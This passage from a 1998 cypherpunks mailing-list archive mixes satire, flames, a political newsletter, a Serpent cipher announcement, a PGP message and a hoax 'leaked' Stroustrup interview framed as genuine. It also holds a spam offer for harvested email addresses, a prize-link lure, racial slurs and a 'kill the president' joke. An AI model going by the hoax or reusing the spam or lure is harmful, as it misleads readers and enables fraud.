  diatribes against M$, as a result of my not having any appreciable
  computer skills.
3. That Blanc Weber provide me with a notarized document signed by
  a reputable physician stating that s/he has examined her, and 
  revealing whether or not she is wearing panties.
4. You recall the team of hired assassins who are currently training
  their cross-hairs on my toilet, through the bathroom window.
  (I need to take a helluva piss, and the kitchen sink is backed-up.)
5. Some other conditions which I can't remember because I am running
  low on my medications, but I will hold you to those conditions,
  regardless.
6. You throw your support behind legislation aimed at eliminating
  discrimination based on species. (My dog, Baby, asked me to
  include this condition. She promised to quit hogging the 'good
  pillow' if you would agree to this.)

Looking forward to your reply,
Toto<toto@sk.sympatico.ca>
"It's not a DEATH THREAT!!! until *I* say it's a DEATH THREAT!!!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 24 Mar 1998 17:54:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: While you were bending over for the soap... / Re: Kill 'em all...*I'll* sort 'em out...
Message-ID: <199803250154.CAA12695@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


TM forged:
> within the slightly more infinite boundaries of

ATTN: Circle of Eunuchs Initiates !!!

An in-depth investigation by the NSA has confirmed, beyond a shadow of
a doubt, that the dark-conspiracy manifestos that make up 'The True
Story of the InterNet' series, as well as all peripheral communications
from various CoE members, has been nothing more than a clever ruse to
subversively slip the concept quoted above into the minds of the
unsuspecting schills of the Author.

Please be advised that individuals who allow themselves to be influenced
by the subversive concept expressed above run the risk of mistakenly
acting under the assumption that 'infinity' can be defined by the
individual, and thus they are capable of escaping the limitations which
the programmed reality of those in authority over them exercises in
order to protect them from the madness which can result from attempting
to cross the boundaries of thought and action which have long since
been proven statistically safe to transverse, according to recent CNN
polls designed to ensure that we all remain safely within the pens
within which airport security personnel and tax officials are acting
in our best interests.

Those who disagree with the stance taken by the author of this post
will be audited by the IRS as potential troublemakers.

Thank You,
the author of this post





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Wed, 25 Mar 1998 00:14:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Or is it Pat Robertson?
Message-ID: <484377db.3518bcc7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Nobody - "Get back to us when you pull your head out of your ass and learn how
to properly quote in replies."

How about now?  :-)  Or am have I been unsubscribed again by some imposter?
;-)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 24 Mar 1998 19:37:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: i need off
Message-ID: <199803250337.EAA25556@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Name wrote:
> 
> how the hell do i get off this mailing list???

Kill the president.

Wm. Clinton <president@whitehouse.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 24 Mar 1998 21:02:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Crypto, anyone?
Message-ID: <199803250502.GAA04800@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Name wrote:
> 
> i need off this mailing list now

Don't we all...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Wed, 25 Mar 1998 06:39:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Crypto, anyone?
Message-ID: <199803251435.GAA29995@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Name <m.d.allen@csu-e.csuohio.edu> wrote:

> i need off this mailing list now

No one can take you off this list. We don't know or care 
how you got onto this list. This is an intelligence
test. Until you can prove that you are not a clueless
fuckwit by disappearing, we will continue to laugh at
your sorry whines.

Life's a bitch. Deal with it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Wed, 25 Mar 1998 00:57:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Prologue 13/0 -- SPACE ALIENS HIDE MY DRUGS!
In-Reply-To: <3518AA73.4569@dev.null>
Message-ID: <Pine.LNX.3.96.980325083408.2892B-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Mar 1998, Potential Bill Gates Assassins Union (Local 709) wrote:

>   The beginning of my downfall as a 'command-line kind of guy' was
> when I was forced to trade in my XT with a 20M hard drive and 2M of
> RAM because of the requirement of the only ISP available to me
> that I be able to run Windoze.

Then your ISP sucks rocks. My ISP officially claims that Windows is
required, but they lie. Several customers run Linux, a few use FreeBSD,
and at least one runs plain old DOS 6.22.

dave "mmm.... sockets"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Six <ualdv8@sk.sympatico.ca>
Date: Wed, 25 Mar 1998 09:25:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: CypherPunk Road Rangers]
Message-ID: <35193EC5.2537@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


----- Begin Creating Forwarded Message -----

[Bienfait Nutly News] THE RECENTLY DISBANDED CANADIAN CYPHERPUNK ROAD
Rangers drown their sorrows at the First Daily Bienfait Wine Tasters
Keg Party, held at the Coaldust Saloon in DoWell, Saskatchewan.

The RoadPunks were the toast of the town last week, when they acquired
the Road Rage Control Contract awarded by the Canadian Emotional Crimes
Commission.
They were also the toast of the town last night (any excuse for a party,
eh?), when the contract was revoked as a result of an internal argument
within RoadPunk ranks that turned into an ugly free-for-all on the 
TransCanada Highway which quickly became a real-life demolition 
derby which injured many innocent, passing travelers, as well.

The trouble started when some of the Canadian CypherPunks took offense
to some of the actions by various of their American counterparts, who
had been invited up to participate in enforcement of the new Emotional
Crimes Laws.
Tim May, the !Diplomatic Representative of the American faction, angered
the Canadians when he stopped a man who had cut him off in heavy traffic
and told him, "You drive like a Chinaman, chop, chop." The Canadians
were momentarily appeased after May agreed that, while in Canada, he
would treat people of Oriental ancestry with respect, and discriminate
against wagon-burners and rag-heads, according to local customs.
All hell broke loose, however, when May then fired several shots into
the side of a passing car which was driving in a perfectly normal
fashion, explaining, "He might not have cut me off, but you can bet
your ass he cut off someone, somewhere, sometime..." and then refused
to allow the Canadian CypherPunks to borrow his illegally imported
gun to play with.

Local and federal law enforcement officials were persuaded to drop
all charges against the RoadPunks, in return for Peter Trei signing
over the Canadian rights for use of the Adrenalyzer, which measures
the amount of adrenaline in a driver's blood. It is reported to be
an early prototype of the Trei Transponder, developed in a secret
underground CypherPunks laboratory, by Reptilian CypherPunks.

----- End Forwarding Created Message -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 25 Mar 1998 13:53:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Student Refuses to Whore Himself, Gets Suspended
Message-ID: <35197DA9.5080@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Eric Cordian wrote:

> we have this story
> out of Georgia, where a student was suspended for a day for failing to
> properly prostitute himself to corporate johns on behalf of his
> pimping principal.
> -----
 
> EVANS, Ga. (AP) -- It's the real thing all right -- suspension.
> 
> High school senior Mike Cameron is serving a one-day suspension today
> for wearing a Pepsi shirt on Coke Day, an event school officials
> crafted in an attempt to win a $500 contest run by the Coca-Cola
> Bottling Co.

It could be worse. They could have transferred me to the "Home Shoppers 
Bargain Psychiatry Warehouse".
That's the worst of the worst. The Shop'ers have the poorest government 
on WebWorld. When the citizens of the former world governments got to 
choose their citizenship at the end of the Channel Revolution every
deadbeat compulsive spender on the face of the Earth signed up with the 
Home Shopper Channel Government. 
~~~     http://www.clas.net/~dave/public/webworld/#Chapter_4

> The Coke-themed day was part of an effort to win the contest. The
> award will go to the school that comes up with the best method of
> distributing promotional discount cards to students.

The Shop'ers ran ads showing Leona purchasing magnificent jewelry and 
other high-priced items from the Home Shopping Channel and the masses 
rushed to join the bandwagon. Some of the slightly more discriminating
people became citizens of the Consumer Channel, but they were few and 
far between. 
~~~     http://www.clas.net/~dave/public/webworld/#Chapter_4

The Sex Channel offered some rather interesting incentives for new 
citizens. They did quite well in the final ratings (what had formerly 
been called 'election results'), despite fierce competition from the 
S&M Channel, the Group Sex Channel, the Lesbian Channel, the 'Buck 
Futters' Channel, and a host of minor players vying for the same basic 
audience.
~~~     http://www.clas.net/~dave/public/webworld/#Chapter_11

> School officials also integrated Coke into class instruction for the
> day, invited Coke executives from Atlanta headquarters 100 miles away
> as speakers and gathered students outside to spell ``Coke'' for the
> photograph.

No doubt General Noriega was given a day-pass to drop one-pound
packages of Peruvian flake out of a helicopter, as loudspeakers
blared, "You deserve a brick today..."

> ~~
> Eric Michael Unamused
> T:.O:.T:.O:. Mathematical Munitions Division,
> Room 200, Mathematical Munitions Addition
> Mathematical Munitions Subdivison,
> Rocky III Road,
> Corollary Corral, California
> "Drink What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Tue, 24 Mar 1998 22:44:12 -0800 (PST)
To: (Recipient list suppressed)
Subject: Pauline Hanson's Newsletter - March 1998
Message-ID: <1.5.4.32.19980325063945.00a9f238@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


March 1998

Issue 1.8, March 1998

----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

Dear One Nation Supporter in NSW,

--------

Have you got your tickets for One Nation first birthday raffle yet?

The first prize is a QANTAS Global Explorer Holiday for two valued at
$12,000 - a 23 day trip visiting Paris, London, New York, Los Angeles,
Anaheim and Honolulu.

The second prize is a 7 day holiday to Hawaii at the Outrigger Reef Hotel
for two - value $5,000.

The third prize is a 7nights stay at the Novotel Palm Cove at Cairns - value
$3,000.

You can order a book of 5 tickets (minimum) at $10 per book (or $2 per
ticket) by credit card by phoning 1800 620088.

Winner's names being drawn at One Nation's Birthday Party at 7pm on April
11th 1998.

Winners will be notified by phone and mail with the results being published
in the Sydney Morning Herald on Friday 17th April 1998.

Be quick - order now while tickets remain!

---------

Pauline Hanson endorsed 12 new Queensland state candidates for the upcoming
elections last week.

One Nation now has over 40 candidates and expects to have candidates in most
of the 85 seats by the time the Qld state election is called.

Web pages:

Pauline Hanson endorsing the candidates at Beenleigh:
http://www.gwb.com.au/onenation/qldstate/been

One Nation Queensland State Election web site:
http://www.gwb.com.au/onenation/qldstate

---------

The issue of the MAI (the multinational's multilateral agreement on
investment) continues to create concern. For the most comprehensive set of
Australian related links on the MAI visit:

http://www.gwb.com.au/mai.html

----------

We hope to have the One Nation Federal Web Site up within the next few weeks
- in the meantime bookmark and visit this URL:

http://www.gwb.com.au/gwb/news/history

we will be covering Pauline Hanson's One Nation birthday party on her farm
live over the Easter weekend of April 10-12. Updates on this URL.

It is still not too late to make a booking - but be quick. Look forward to
seeing you there!

Phone: (02) 9976 0283

----------

GWB




Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PRESIDENT <PRESIDENT@SHITHOUSE.CUM>
Date: Wed, 25 Mar 1998 16:22:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: School Sponsorship]
Message-ID: <35199F40.3444@SHITHOUSE.CUM>
MIME-Version: 1.0
Content-Type: text/plain


----- Begin Obvious Forgery -----

[Bienfait Nutly News] PRESIDENT CLINTON, TUCKING FUNNY-MONEY INTO THE
panties of the topless dancers during their performances at the CoalDust
Saloon's 'Paula Jones and Monica Lewinski Look-Alike Contest,' took time
out from the festivities to announce plans to help prop up the nation's
decaying public school system by allowing Adult WebSites to sponsor
the latest computer technology additions to the schools' InterNet
systems.
"We don't see any harm in this," Clinton told gathered reportwhores,
who were pretty much ignoring him as they watched the dancers, "since
the children won't be able to legally access the URL's being advertised
until they are 18 years old."

In response to concerns about the increasing Corporatization of America, 
Clinton explained that this could be viewed merely as a streamlining
of the already-existing system, by eliminating the middlemen (lobbyists
and politicians) currently adding inefficiency and expense to the
Corporate exercise of free enterprise.
Clinton explained that government and corporations were working toward
a model which worked well for railways when cabooses became automated
and the workers were paid to merely ride the train back and forth.
"We will still hold elections, and attend sittings of the House and
Senate, but we'll just play cards, or read, or something..."

Clinton refused to comment on the recent brouhaha over a student in
San Francisco being expelled for life for wearing a T-shirt with
an elephant on it during a Political Correctness Event sponsored by
the Democratic Party.
He did, however, comment on the expulsion of a student at the University
of California-Bezerkeley, for wearing clothes during the ribbon-cutting
ceremonies for the Naked Guy Boutique. Clinton, looking at photographs
of the event, said, "Hubba, hubba!"
The Naked Guy, also in attendance at the CoalDust Saloon, told drunken,
groping reportwhores of both sexes, "It is my belief that the current
anti-trust actions being taken by the DOJ against the nationwide Naked
Guy Boutique Chain is nothing more than the result of political pressure
by the Anti-NakedGuy Coalition." (The first joint action by a group
composed mostly of Fundamentalist Christian groups and Adult WebSite
operators.)

TToommoorrooww: Gates Pie-Boy Gives Clinton a Wedgie...

---- End Meaningless Blathering -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hisi24@msn.com (Electric Email)
Date: Wed, 25 Mar 1998 20:25:35 -0800 (PST)
To: hisi24@msn.com
Subject: 68 Million Email Addresses - $99
Message-ID: <199803251971BAA12476@post.cvn.com>
MIME-Version: 1.0
Content-Type: text/plain


          68 MILLION
 EMAIL ADDRESSES
 FOR ONLY $99 
       

 You want to make some money? 

 I can put you in touch with over 60 million people at virtualy no cost.

 Can you make one cent from each of theses names?

If you can you have a profit of over $600,000.00 

This offer is not for everyone. 

If you can not see the just how excellent the
 risk / reward ratio in this offer is then there is nothing I can do for you. 

To make money you must stop dreaming and TAKE ACTION.


****************************************

PACKAGE  A

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!

$99.00

****************************************

PACKAGE B

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

$ 139.00

****************************************

PACKAGE  C

THE WORKS

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

             AND 

Over 500 diferent Business Reports

now being sold on the internet for up to

$100 each. You get full rights to resell these reports.

With this package you get the email addresses, 

the software to mail them AND ready to sell  information products.

AND ...... 

. a collection of the 100 best money making

adds currently floating around on the internet.

$ 189

****************************************

SEVERAL WAYS TO ORDER !!!

IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 68 MILLION + NAMES WITHIN 12 HOURS OF YOUR ORDER!!!

 
  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
 
     TYPE OF CARD  AMX / VISA / MC??_______________

      EXPIRATION DATE   ___________________________
 
     NAME ON CREDIT CARD________________________
 
     CREDIT CARD #________________________________
 
     BILLING ADDRESS ____________________________
 
     CITY_________________________________________
 
    STATE________________ZIP_____________________
 
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 

        WE WILL BILL selected amount to your account plus the following shipping costs

        SHIPPING  COST OF 3.85 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
 
        SALES TAX (7.25%) added to CA residents 
 
  >>> Send correct amount in cash, check or money

order to:

  >>> ELECTRIC EMAIL
  >>> 702 Mangrove Avenue, Suite 151
  >>> Chico, CA 95926


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4291.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!



Electric Email is a private company and is not affiliated with, or endorsed by, AOL, MSN, or any other Internet Service Provider.

Copyright 1998

All rights reserved

Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof, or abridging the freedom of speech 
or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.         
    
Amendment I, The US Constitution                                                                :-)
1 sending mes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Name <m.d.allen@csu-e.csuohio.edu>
Date: Tue, 24 Mar 1998 19:09:46 -0800 (PST)
To: "'Anonymous'" <cypherpunks@toad.com>
Subject: RE: Crypto, anyone?
Message-ID: <01BD583A.44BE1FA0.m.d.allen@popmail.csuohio.edu>
MIME-Version: 1.0
Content-Type: text/plain


i need off this mailing list now

On Sunday, March 22, 1998 1:40 AM, Anonymous [SMTP:nobody@replay.com] wrote:
> andrew fabbro wrote:
> > 
> > I was just wondering if anyone would be interested in discussing
> > cryptography, personal privacy, security protocols, digital signatures,
> > anonymous remailers, digital cash, crypto anarchy...?  No?  OK, then we
> > can go back to spam, Microsoft bashing, calling each other "idiots" and
> > "chickens," and forwarding News of the Weird for no obvious reason.
> 
> What the fuck is crypto? Can you *say* that on a public mailing
> list?
> Isn't child cryptography illegal?
> Isn't sharing pubic keys a form of perversion?
> Is digital cash used to buy a blow-job?
> 
> "How can you tell when Windows is about to crash?"
> 	"It boots."
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Wed, 25 Mar 1998 22:09:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Serpent - A New Block Cipher Proposal for AES
Message-ID: <19980326060902.29058.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Serpent - A New Block Cipher Proposal for AES

Over the last six months, I have been working with Ross Anderson and 
Lars Knudsen to develop a candidate block cipher for the Advanced 
Encryption Standard. 
Our algorithm, called Serpent, is described in a paper that will appear 
at the 5th workshop on FastSoftware Encryption.A reference 
implementation by Frank Stajano, a research students of Ross, is 
available here. 

The authors' home pages can be found both in 
http://www.cs.technion.ac.il/~biham/, http://www.ii.uib.no/~larsr/, and
http://www.cl.cam.ac.uk/users/rja14/.
The authors' email addresses are biham@cs.technion.ac.il, 
larsr@ii.uib.no, and rja14@cl.cam.ac.uk.





______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <genocide@Genocide2600.com>
Date: Wed, 25 Mar 1998 23:52:45 -0800 (PST)
To: CypherPunks <cypherpunks@toad.com>
Subject: Cumman nA mBamm
Message-ID: <Pine.LNX.3.96.980325235138.11689B-100000@adric.genocide2600.com>
MIME-Version: 1.0
Content-Type: text/plain



	I heard of this person today, yes that is a name, she is supposed
to be a terrorist or something, does anyone have any info on her?

Genocide
Head of the Genocide2600 Group
Board Member of E.H.A.P

============================================================================
         ____________________
  *---===|                  |===---*
  *---===|     Genocide     |===---*  "Courage is not defined by those who 
  *---===|       2600       |===---*   fought and did not fall, but by those
  *---===|__________________|===---*   who fought, fell, and rose again."
                                       
Email:  Genocide@Genocide2600.com
Web:	http://www.Genocide2600.com

Check out the mud at:		genocide2600.com 6666
UIN:	1449140
============================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 25 Mar 1998 22:46:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 14/0 -- Passoword: cypherpunks
Message-ID: <3519FA5E.50A9@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP MESSAGE-----
Version: PGP for Business Security 5.5

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
xzASVd+P1DvPOMWZ9Bfhcd+VBgfwvJqby+4we1c=
=0442
-----END PGP MESSAGE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 25 Mar 1998 16:58:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [Fwd: School Sponsorship]
Message-ID: <199803260058.BAA27456@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


TRUTHMONGER FOR PRESIDENT wrote:
: ----- Begin Obvious Forgery -----
: Clinton refused to comment on the recent brouhaha over a student in
: San Francisco being expelled for life for wearing a T-shirt with
: an elephant on it during a Political Correctness Event sponsored by
: the Democratic Party.

Truthmonger occassionally takes time out from being a loudmouthed pain
in the butt to illustrate a valid point. Free speech is free speech
whether it involves a Pepsi logo or a political logo.

A person could make an equally ridiculous and equally valid point by
suggesting the expulsion of black students for not showing up to
school in whiteface during events sponsored by the Aryan Nations.

Unfortunately the school officials involved feel justified in excusing
their repression of civil rights and liberties by downplaying the
specifics of the compromise of freedom they demanded of their students
in return for corporate funding.
Like gun-control and GAK proponents they are asking for only a "small
compromise" as an ante into a game which will eventually result in
the players with the largest pockets naming the game.

Even the most outrageous of silly conspiracy theory posts to the list
failed to predict the advent of mandatory-voluntary Coke T-shirts in
the school system. Is the cuality of qraziness on the list slipping?

: TToommoorrooww: Gates Pie-Boy Gives Clinton a Wedgie...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 25 Mar 1998 21:38:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Constable Hettinga?
Message-ID: <199803260538.GAA02112@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Finally, we have proof...

http://www3.sk.sympatico.ca/carljohn/rcmphate/rcmphate.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John807601 <John807601@aol.com>
Date: Thu, 26 Mar 1998 05:57:06 -0800 (PST)
Subject: You've won!
Message-ID: <1558d5e1.351a5e36@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: John807601@aol.com
Subject: You've won!
From: John807601 <John807601@aol.com>
Date: Thu, 26 Mar 1998 08:01:14 EST
Organization: AOL (http://www.aol.com)

<a href="http://www.downset.net/index2.html">Click Here To Claim Your
Prize</a>

http://www.downset.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor <fygrave@freenet.bishkek.su>
Date: Wed, 25 Mar 1998 20:52:07 -0800 (PST)
To: Bad_B0yZ:;
Subject: Thought you'd like this alot (fwd)
Message-ID: <Pine.LNX.3.96.980326095257.149L-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


Heh... Wanna hear the C++ creator thoughts regarding the malevolent
creation, he made?:-)

=========/qoute/=======================/quote/====================
[snip snip]
Date: Mon, 09 Feb 1998 23:31:02 -0800
Subject: Stroustrup's interview leaked...

On the 1st of January, 1998, Bjarne Stroustrup gave an interview
to the IEEE's 'Computer' magazine.

Naturally, the editors thought he would be giving a retrospective
view of seven years of object-oriented design, using the language
he created.

By the end of the interview, the interviewer got more than he had
bargained for and, subsequently, the editor decided to suppress
its contents, 'for the good of the industry' but, as with many of
these things, there was a leak.

Here is a complete transcript of what was said, unedited, and
unrehearsed, so it isn't as neat as planned interviews.
You will find it interesting...
__________________________________________________________________
Interviewer:  Well, it's been a few years since you changed the
world of software design, how does it feel, looking back?

Stroustrup:  Actually, I was thinking about those days, just
before you arrived. Do you remember?  Everyone was writing 'C'
and, the trouble was, they were pretty damn good at it.
were turning out competent - I stress the word 'competent'
graduates at a phenomenal rate. That's what caused the problem.

Interviewer:  Problem?

Stroustrup:  Yes, problem. Remember when everyone wrote Cobol?

Interviewer:  Of course, I did too

Stroustrup:  Well, in the beginning, these guys were like
demi-gods. Their salaries were high, and they were treated like
royalty.

Interviewer:  Those were the days, eh?

Stroustrup:  Right. So what happened?  IBM got sick of it, and
invested millions in training programmers, till they were a dime
a dozen.

Interviewer:  That's why I got out. Salaries dropped within a
year, to the point where being a journalist actually paid
better.

Stroustrup:  Exactly. Well, the same happened with 'C' programmers.

Interviewer:  I see, but what's the point?

Stroustrup:  Well, one day, when I was sitting in my office, I
thought of this little scheme, which would redress the
balance a little. I thought 'I wonder what would happen, if
there were a language so complicated, so difficult to learn,
that nobody would ever be able to swamp the market with
programmers?  Actually, I got some of the ideas from X10,
you know, X windows. That was such a bitch of a graphics
system, that it only just ran on those Sun 3/60 things.
They had all the ingredients for what I wanted. A really
